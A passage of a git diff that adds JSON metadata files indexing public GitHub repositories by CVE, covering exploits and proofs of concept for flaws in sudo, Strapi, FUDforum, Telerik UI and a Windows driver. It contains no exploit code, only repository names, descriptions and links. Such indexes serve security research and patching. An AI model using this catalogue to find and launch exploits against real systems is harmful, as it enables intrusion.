"https:\/\/github.com\/saleemrashid", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saleemrashid\/sudo-cve-2019-18634", + "description": "Proof of Concept for CVE-2019-18634", + "fork": false, + "created_at": "2020-02-07T18:07:03Z", + "updated_at": "2024-11-27T21:33:37Z", + "pushed_at": "2021-09-12T02:55:24Z", + "stargazers_count": 209, + "watchers_count": 209, + "has_discussions": false, + "forks_count": 44, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 44, + "watchers": 209, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 240249499, + "name": "CVE-2019-18634", + "full_name": "N1et\/CVE-2019-18634", + "owner": { + "login": "N1et", + "id": 34748334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34748334?v=4", + "html_url": "https:\/\/github.com\/N1et", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/N1et\/CVE-2019-18634", + "description": "An Python Exploit for Sudo vulnerability CVE-2019-18634", + "fork": false, + "created_at": "2020-02-13T11:57:38Z", + "updated_at": "2021-08-11T10:09:24Z", + "pushed_at": "2021-08-11T10:09:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 245932147, + "name": "CVE-2019-18634", + "full_name": "ptef\/CVE-2019-18634", + "owner": { + "login": "ptef", + "id": 8737680, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8737680?v=4", + "html_url": "https:\/\/github.com\/ptef", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ptef\/CVE-2019-18634", + "description": "exploit for sudo CVE-2019-18634", + "fork": false, + "created_at": "2020-03-09T03:05:57Z", + "updated_at": "2023-06-21T10:01:54Z", + "pushed_at": "2022-11-07T15:59:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 361512339, + "name": "sudo-cve-2019-18634", + "full_name": "edsonjt81\/sudo-cve-2019-18634", + "owner": { + "login": "edsonjt81", + "id": 27496739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27496739?v=4", + "html_url": "https:\/\/github.com\/edsonjt81", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/edsonjt81\/sudo-cve-2019-18634", + "description": null, + "fork": false, + "created_at": "2021-04-25T18:53:17Z", + "updated_at": "2021-06-13T13:30:42Z", + "pushed_at": "2021-04-25T18:53:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 364464831, + "name": "CVE-2019-18634", + "full_name": "paras1te-x\/CVE-2019-18634", + "owner": { + "login": "paras1te-x", + "id": 78490741, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78490741?v=4", + "html_url": "https:\/\/github.com\/paras1te-x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paras1te-x\/CVE-2019-18634", + "description": "exploit", + "fork": false, + "created_at": "2021-05-05T04:53:05Z", + "updated_at": "2021-05-05T04:53:06Z", + "pushed_at": "2021-05-05T04:53:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 391601106, + "name": "CVE-2019-18634", + "full_name": "aesophor\/CVE-2019-18634", + "owner": { + "login": "aesophor", + "id": 32998585, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32998585?v=4", + "html_url": "https:\/\/github.com\/aesophor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aesophor\/CVE-2019-18634", + "description": "My n-day exploit for CVE-2019-18634 (local privilege escalation)", + "fork": false, + "created_at": "2021-08-01T10:50:55Z", + "updated_at": "2023-05-31T05:55:19Z", + "pushed_at": "2021-08-14T02:33:32Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 471852866, + "name": "saleemrashid-sudo-cve-2019-18634", + "full_name": "TheJoyOfHacking\/saleemrashid-sudo-cve-2019-18634", + "owner": { + "login": "TheJoyOfHacking", + "id": 99463221, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99463221?v=4", + "html_url": "https:\/\/github.com\/TheJoyOfHacking", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheJoyOfHacking\/saleemrashid-sudo-cve-2019-18634", + "description": null, + "fork": false, + "created_at": "2022-03-20T01:39:22Z", + "updated_at": "2022-03-20T01:39:34Z", + "pushed_at": "2022-03-20T01:39:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736124655, + "name": "CVE-2019-18634", + "full_name": "DDayLuong\/CVE-2019-18634", + "owner": { + "login": "DDayLuong", + "id": 154918019, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154918019?v=4", + "html_url": "https:\/\/github.com\/DDayLuong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DDayLuong\/CVE-2019-18634", + "description": null, + "fork": false, + "created_at": "2023-12-27T03:52:49Z", + "updated_at": "2023-12-27T03:53:45Z", + "pushed_at": "2023-12-27T04:39:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786354163, + "name": "CVE-2019-18634", + "full_name": "chanbakjsd\/CVE-2019-18634", + "owner": { + "login": "chanbakjsd", + "id": 29669945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29669945?v=4", + "html_url": "https:\/\/github.com\/chanbakjsd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chanbakjsd\/CVE-2019-18634", + "description": "A reproduction of CVE-2019-18634, sudo privilege escalation with buffer overflow.", + "fork": false, + "created_at": "2024-04-14T07:36:54Z", + "updated_at": "2024-04-14T07:37:23Z", + "pushed_at": "2024-04-14T07:37:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-18655.json b/2019/CVE-2019-18655.json new file mode 100644 index 0000000000..053b0e7974 --- /dev/null +++ b/2019/CVE-2019-18655.json @@ -0,0 +1,44 @@ +[ + { + "id": 328359360, + "name": "CVE-2019-18655", + "full_name": "0xhuesca\/CVE-2019-18655", + "owner": { + "login": "0xhuesca", + "id": 42644824, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42644824?v=4", + "html_url": "https:\/\/github.com\/0xhuesca", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xhuesca\/CVE-2019-18655", + "description": "CVE-2019-18655 metasploit module. SEH based buffer overflow in file sharing wizard app v.1.5.0. ", + "fork": false, + "created_at": "2021-01-10T10:45:49Z", + "updated_at": "2022-04-30T08:46:37Z", + "pushed_at": "2022-04-30T08:48:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "binary", + "binary-exploitation", + "buffer", + "buffer-overflow", + "metasploit", + "metasploit-modules", + "offensive-security", + "security-research", + "seh", + "structured-exception-handling" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-18683.json b/2019/CVE-2019-18683.json new file mode 100644 index 0000000000..8b48f0943d --- /dev/null +++ b/2019/CVE-2019-18683.json @@ -0,0 +1,64 @@ +[ + { + "id": 263419218, + "name": "CVE-2019-18683", + "full_name": "sanjana123-cloud\/CVE-2019-18683", + "owner": { + "login": "sanjana123-cloud", + "id": 65147528, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65147528?v=4", + "html_url": "https:\/\/github.com\/sanjana123-cloud", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sanjana123-cloud\/CVE-2019-18683", + "description": null, + "fork": false, + "created_at": "2020-05-12T18:31:36Z", + "updated_at": "2020-05-12T18:48:24Z", + "pushed_at": "2020-05-12T18:48:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 325828432, + "name": "cve-2019-18683", + "full_name": "Limesss\/cve-2019-18683", + "owner": { + "login": "Limesss", + "id": 55912947, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55912947?v=4", + "html_url": "https:\/\/github.com\/Limesss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Limesss\/cve-2019-18683", + "description": null, + "fork": false, + "created_at": "2020-12-31T15:40:28Z", + "updated_at": "2024-01-25T09:17:47Z", + "pushed_at": "2022-11-13T07:15:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1881.json b/2019/CVE-2019-1881.json new file mode 100644 index 0000000000..bc2def608d --- /dev/null +++ b/2019/CVE-2019-1881.json @@ -0,0 +1,33 @@ +[ + { + "id": 416366049, + "name": "Strapi-CVE-2019-1881", + "full_name": "Shadawks\/Strapi-CVE-2019-1881", + "owner": { + "login": "Shadawks", + "id": 47142028, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47142028?v=4", + "html_url": "https:\/\/github.com\/Shadawks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shadawks\/Strapi-CVE-2019-1881", + "description": "Proof of concept for Strapi CVE-2019-18818 - Unauthenticated Password Reset Vulnerability \/ Privilege Escalation", + "fork": false, + "created_at": "2021-10-12T14:16:17Z", + "updated_at": "2022-02-02T13:35:26Z", + "pushed_at": "2021-10-12T14:27:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-18818.json b/2019/CVE-2019-18818.json new file mode 100644 index 0000000000..171e3740a9 --- /dev/null +++ b/2019/CVE-2019-18818.json @@ -0,0 +1,126 @@ +[ + { + "id": 401163597, + "name": "CVE-2019-18818", + "full_name": "guglia001\/CVE-2019-18818", + "owner": { + "login": "guglia001", + "id": 7321539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7321539?v=4", + "html_url": "https:\/\/github.com\/guglia001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guglia001\/CVE-2019-18818", + "description": null, + "fork": false, + "created_at": "2021-08-29T23:30:15Z", + "updated_at": "2022-05-11T12:07:47Z", + "pushed_at": "2021-08-29T23:32:37Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 415789019, + "name": "CVE-2019-18818", + "full_name": "rasyidfox\/CVE-2019-18818", + "owner": { + "login": "rasyidfox", + "id": 88673568, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88673568?v=4", + "html_url": "https:\/\/github.com\/rasyidfox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rasyidfox\/CVE-2019-18818", + "description": null, + "fork": false, + "created_at": "2021-10-11T05:24:04Z", + "updated_at": "2021-10-11T05:29:07Z", + "pushed_at": "2021-10-11T05:29:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468144774, + "name": "strapi_cms_3.0.0-beta.17.7", + "full_name": "hadrian3689\/strapi_cms_3.0.0-beta.17.7", + "owner": { + "login": "hadrian3689", + "id": 71423134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4", + "html_url": "https:\/\/github.com\/hadrian3689", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hadrian3689\/strapi_cms_3.0.0-beta.17.7", + "description": "CVE-2019-18818\/19606 Strapi RCE", + "fork": false, + "created_at": "2022-03-10T00:59:07Z", + "updated_at": "2023-01-03T01:54:22Z", + "pushed_at": "2023-08-01T01:01:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822532912, + "name": "Strapi-RCE", + "full_name": "Hackhoven\/Strapi-RCE", + "owner": { + "login": "Hackhoven", + "id": 142750639, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142750639?v=4", + "html_url": "https:\/\/github.com\/Hackhoven", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hackhoven\/Strapi-RCE", + "description": "Exploit script showcasing a mixture of CVE-2019-18818 and CVE-2019-19609 for unauthenticated remote code execution in Strapi CMS.", + "fork": false, + "created_at": "2024-07-01T10:23:19Z", + "updated_at": "2024-07-01T15:23:47Z", + "pushed_at": "2024-07-01T15:23:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-18845.json b/2019/CVE-2019-18845.json new file mode 100644 index 0000000000..47c8bbc9a7 --- /dev/null +++ b/2019/CVE-2019-18845.json @@ -0,0 +1,33 @@ +[ + { + "id": 512356911, + "name": "CVE-2019-18845", + "full_name": "fengjixuchui\/CVE-2019-18845", + "owner": { + "login": "fengjixuchui", + "id": 2487206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2487206?v=4", + "html_url": "https:\/\/github.com\/fengjixuchui", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fengjixuchui\/CVE-2019-18845", + "description": "The MsIo64.sys and MsIo32.sys drivers in Patriot Viper RGB before 1.1 allow local users (including low integrity processes) to read and write to arbitrary memory locations, and consequently gain NT AUTHORITY\\SYSTEM privileges, by mapping \\Device\\PhysicalMemory into the calling process via ZwOpenSection and ZwMapViewOfSection.", + "fork": false, + "created_at": "2022-07-10T05:53:41Z", + "updated_at": "2024-04-03T21:41:01Z", + "pushed_at": "2022-07-10T04:20:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-18873.json b/2019/CVE-2019-18873.json new file mode 100644 index 0000000000..27705bdbfc --- /dev/null +++ b/2019/CVE-2019-18873.json @@ -0,0 +1,36 @@ +[ + { + "id": 217798293, + "name": "FUDforum-XSS-RCE", + "full_name": "fuzzlove\/FUDforum-XSS-RCE", + "owner": { + "login": "fuzzlove", + "id": 44779781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44779781?v=4", + "html_url": "https:\/\/github.com\/fuzzlove", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fuzzlove\/FUDforum-XSS-RCE", + "description": "FUDForum 3.0.9 - XSS \/ Remote Code Execution (CVE-2019-18873, CVE-2019-18839)", + "fork": false, + "created_at": "2019-10-27T03:07:26Z", + "updated_at": "2022-07-16T22:03:47Z", + "pushed_at": "2019-11-13T20:56:14Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "penetration-testing" + ], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-18885.json b/2019/CVE-2019-18885.json new file mode 100644 index 0000000000..8da9bda41e --- /dev/null +++ b/2019/CVE-2019-18885.json @@ -0,0 +1,33 @@ +[ + { + "id": 221140075, + "name": "CVE-2019-18885", + "full_name": "bobfuzzer\/CVE-2019-18885", + "owner": { + "login": "bobfuzzer", + "id": 57654744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57654744?v=4", + "html_url": "https:\/\/github.com\/bobfuzzer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bobfuzzer\/CVE-2019-18885", + "description": null, + "fork": false, + "created_at": "2019-11-12T05:50:00Z", + "updated_at": "2020-10-25T07:09:02Z", + "pushed_at": "2020-10-25T07:09:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-18890.json b/2019/CVE-2019-18890.json new file mode 100644 index 0000000000..9cfca6bf0d --- /dev/null +++ b/2019/CVE-2019-18890.json @@ -0,0 +1,33 @@ +[ + { + "id": 231370688, + "name": "CVE-2019-18890", + "full_name": "RealLinkers\/CVE-2019-18890", + "owner": { + "login": "RealLinkers", + "id": 22389074, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22389074?v=4", + "html_url": "https:\/\/github.com\/RealLinkers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RealLinkers\/CVE-2019-18890", + "description": "CVE-2019-18890 POC (Proof of Concept)", + "fork": false, + "created_at": "2020-01-02T11:44:47Z", + "updated_at": "2024-08-12T19:56:13Z", + "pushed_at": "2020-01-06T13:13:58Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-18935.json b/2019/CVE-2019-18935.json new file mode 100644 index 0000000000..f3319db41d --- /dev/null +++ b/2019/CVE-2019-18935.json @@ -0,0 +1,343 @@ +[ + { + "id": 116822376, + "name": "RAU_crypto", + "full_name": "bao7uo\/RAU_crypto", + "owner": { + "login": "bao7uo", + "id": 21125224, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21125224?v=4", + "html_url": "https:\/\/github.com\/bao7uo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bao7uo\/RAU_crypto", + "description": "Telerik UI for ASP.NET AJAX File upload and .NET deserialisation exploit (CVE-2017-11317, CVE-2017-11357, CVE-2019-18935)", + "fork": false, + "created_at": "2018-01-09T13:53:57Z", + "updated_at": "2024-10-17T10:56:55Z", + "pushed_at": "2020-08-22T06:15:54Z", + "stargazers_count": 169, + "watchers_count": 169, + "has_discussions": false, + "forks_count": 48, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 48, + "watchers": 169, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 227551486, + "name": "CVE-2019-18935", + "full_name": "noperator\/CVE-2019-18935", + "owner": { + "login": "noperator", + "id": 6006772, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6006772?v=4", + "html_url": "https:\/\/github.com\/noperator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/noperator\/CVE-2019-18935", + "description": "RCE exploit for a .NET JSON deserialization vulnerability in Telerik UI for ASP.NET AJAX.", + "fork": false, + "created_at": "2019-12-12T07:58:11Z", + "updated_at": "2024-11-07T07:24:42Z", + "pushed_at": "2022-04-14T18:23:38Z", + "stargazers_count": 348, + "watchers_count": 348, + "has_discussions": false, + "forks_count": 85, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 85, + "watchers": 348, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 264582614, + "name": "Telerik_CVE-2019-18935", + "full_name": "becrevex\/Telerik_CVE-2019-18935", + "owner": { + "login": "becrevex", + "id": 8326868, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8326868?v=4", + "html_url": "https:\/\/github.com\/becrevex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/becrevex\/Telerik_CVE-2019-18935", + "description": "TelerikUI Vulnerability Scanner (CVE-2019-18935)", + "fork": false, + "created_at": "2020-05-17T04:22:45Z", + "updated_at": "2022-06-27T14:49:55Z", + "pushed_at": "2021-01-21T06:12:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 266727346, + "name": "Telerik_CVE-2019-18935", + "full_name": "ThanHuuTuan\/Telerik_CVE-2019-18935", + "owner": { + "login": "ThanHuuTuan", + "id": 32167814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32167814?v=4", + "html_url": "https:\/\/github.com\/ThanHuuTuan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThanHuuTuan\/Telerik_CVE-2019-18935", + "description": "TelerikUI Vulnerability Scanner (CVE-2019-18935)", + "fork": false, + "created_at": "2020-05-25T08:37:51Z", + "updated_at": "2024-09-14T09:03:14Z", + "pushed_at": "2023-05-10T02:17:34Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 267794567, + "name": "CVE_2019_18935", + "full_name": "ThanHuuTuan\/CVE_2019_18935", + "owner": { + "login": "ThanHuuTuan", + "id": 32167814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32167814?v=4", + "html_url": "https:\/\/github.com\/ThanHuuTuan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThanHuuTuan\/CVE_2019_18935", + "description": "This project for CVE-2019-18935", + "fork": false, + "created_at": "2020-05-29T07:29:52Z", + "updated_at": "2024-08-09T13:22:10Z", + "pushed_at": "2020-05-29T07:33:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 288791272, + "name": "CVE-2019-18935", + "full_name": "murataydemir\/CVE-2019-18935", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2019-18935", + "description": "[CVE-2019-18935] Telerik UI for ASP.NET AJAX (RadAsyncUpload Handler) .NET JSON Deserialization", + "fork": false, + "created_at": "2020-08-19T17:11:02Z", + "updated_at": "2024-10-01T00:08:36Z", + "pushed_at": "2020-08-25T07:55:22Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 290603148, + "name": "Telerik_CVE-2019-18935", + "full_name": "appliedi\/Telerik_CVE-2019-18935", + "owner": { + "login": "appliedi", + "id": 5700251, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5700251?v=4", + "html_url": "https:\/\/github.com\/appliedi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/appliedi\/Telerik_CVE-2019-18935", + "description": "TelerikUI Vulnerability Scanner (CVE-2019-18935)", + "fork": false, + "created_at": "2020-08-26T20:57:11Z", + "updated_at": "2021-07-21T15:53:50Z", + "pushed_at": "2020-07-22T14:17:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 299878199, + "name": "CVE-2019-18935", + "full_name": "random-robbie\/CVE-2019-18935", + "owner": { + "login": "random-robbie", + "id": 4902869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4902869?v=4", + "html_url": "https:\/\/github.com\/random-robbie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/random-robbie\/CVE-2019-18935", + "description": "CVE-2019-18935", + "fork": false, + "created_at": "2020-09-30T10:00:16Z", + "updated_at": "2021-04-26T19:40:37Z", + "pushed_at": "2020-09-30T10:00:43Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 422651571, + "name": "CVE-2019-18935-checker", + "full_name": "0xAgun\/CVE-2019-18935-checker", + "owner": { + "login": "0xAgun", + "id": 78228966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78228966?v=4", + "html_url": "https:\/\/github.com\/0xAgun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xAgun\/CVE-2019-18935-checker", + "description": null, + "fork": false, + "created_at": "2021-10-29T16:57:46Z", + "updated_at": "2024-08-12T20:17:38Z", + "pushed_at": "2021-10-29T17:04:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 550909457, + "name": "Telerik-UI-ASP.NET-AJAX-Exploitation", + "full_name": "KasunPriyashan\/Telerik-UI-ASP.NET-AJAX-Exploitation", + "owner": { + "login": "KasunPriyashan", + "id": 97877907, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97877907?v=4", + "html_url": "https:\/\/github.com\/KasunPriyashan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KasunPriyashan\/Telerik-UI-ASP.NET-AJAX-Exploitation", + "description": "Unrestricted File Upload by Weak Encryption affected versions (CVE-2017-11317) 2. Remote Code Execution by Insecure Deserialization - (CVE-2019-18935)", + "fork": false, + "created_at": "2022-10-13T14:21:31Z", + "updated_at": "2022-10-13T14:21:31Z", + "pushed_at": "2022-10-13T14:22:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735501289, + "name": "CVE-2019-18935-memShell", + "full_name": "dust-life\/CVE-2019-18935-memShell", + "owner": { + "login": "dust-life", + "id": 33139576, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33139576?v=4", + "html_url": "https:\/\/github.com\/dust-life", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dust-life\/CVE-2019-18935-memShell", + "description": null, + "fork": false, + "created_at": "2023-12-25T06:45:11Z", + "updated_at": "2024-11-25T04:04:21Z", + "pushed_at": "2024-11-25T04:04:18Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git 